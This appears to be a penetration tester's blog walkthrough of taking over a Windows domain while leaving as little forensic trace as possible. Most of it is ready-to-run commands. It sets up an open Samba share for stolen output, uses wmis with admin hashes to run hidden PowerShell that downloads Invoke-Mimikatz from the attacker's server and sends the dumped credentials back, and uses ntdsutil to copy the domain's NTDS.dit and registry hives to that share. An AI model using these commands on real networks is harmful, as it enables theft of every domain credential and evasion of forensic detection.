So lately on pen tests I have been focusing on 1) living off the land, and 2) doing everything I possibly can in memory to leave as little footprint as possible. Got to make the forensics guys earn their pay. To that extent I have been doing some what I think of as rather clever tricks with Kali, WMI, powershell, mimikatz, and samba. I wanted to post this up here so that I can easily find it and remember it in the future. Also I figured some people may be interested in it as well.
At a high level we are going to use wmis on kali to first launch invoke-mimikatz on a collection of machines, writing its output to an open fileshare we control. We will then find any domain administrator accounts. Then using ntdsutil to copy over the NTDS.dit, SYSTEM and SECURITY file. All without anything ever touching the disk.
Step 1: Create a open SAMBA file share on your kali box. For example on mine I added the following to my smb.conf file;
[dmp] path = /root/tmp browseable = yes read only = no guest ok = yes
Then restart samba. This will be where all of our output will go. Thus getting rid of the need to write anything, even temporarily to disk on the victim machine.
Step 2: Download Invoke-Mimikatz.ps1 from github, and put it in /var/www/. Then start apache2. This will be used later.
Step 3: Get a local admin account, and list of machines. This can be done 100 different ways, and is not part of this walk though. Take the list of machines and create a file called targets.txt with one machine name/ip per line.
Step 4: Identify who the domain admins are. This can be done from any computer joined to the domain by running;
c:\net group “Domain Admins” /domain
Or remotely using WMIS and the local admin credentials gathered in step 3 by doing the following;
$ wmis -U [MACHINENAME]\\Administrator%[password or hash whichever you have] //[MACHINENAME] "cmd.exe /c net group \"Domain Admins\" /domain > \\\\[YOUR IP ADDRESS]\\dmp\\domain_admins.txt"
Step 5: Armed with a list of domain admins, a list of target machine, and a local admin account we can run the fun part;
$ for i in $(cat targets.txt);do wmis -U $i\\Administrator%[password or hash] // $i "cmd.exe /c powershell.exe -w hidden -Exec Bypass -noni -nop IEX (New-Object Net.WebClient).DownloadString('http://[YOUR IP ADDRESS]/Invoke-Mimikatz.ps1');Invoke-Mimikatz > \\\\[YOUR IP ADDRESS]\\dmp\\$i.pass";done
This will go through every machine listed log in via WMI using the local admin account. Download mimikatz to memory then execute it. Writing the output to your file share. So nothing is ever written to disk.
Step 6: Grep through all the .pass files for a domain admin accounts credentials. Armed with this we can remote desktop into the DC. Once logged in we can execute the following;
c:\ntdsutil ntdsutil: activate instance ntds ntdsutil: ifm ifm: create full \\[YOUR IP ADDRESS]\dmp ifm: quit ntdsutil: quit
This will create a copy of the NTDS.dit file, the SYSTEM, and the SECURITY file and write them directly to the open file share.
Next Steps: I want to figure out a way to automate a few steps in here. For example I can likely write a simple bash script that takes the password, lists of hosts, and finds the domain admins and reports back any hits. Additionally, I don’t like having to log into the DC. I would prefer if we could use ntdsutil non-interactivly, then we would be able to issue those commands via wmis.
Also if you are wondering why I don’t just use wmiexec.py its because wmiexec.py writes the output to the ADMIN$ share then pulls it down from there. I want to do everything without anything being written to disk.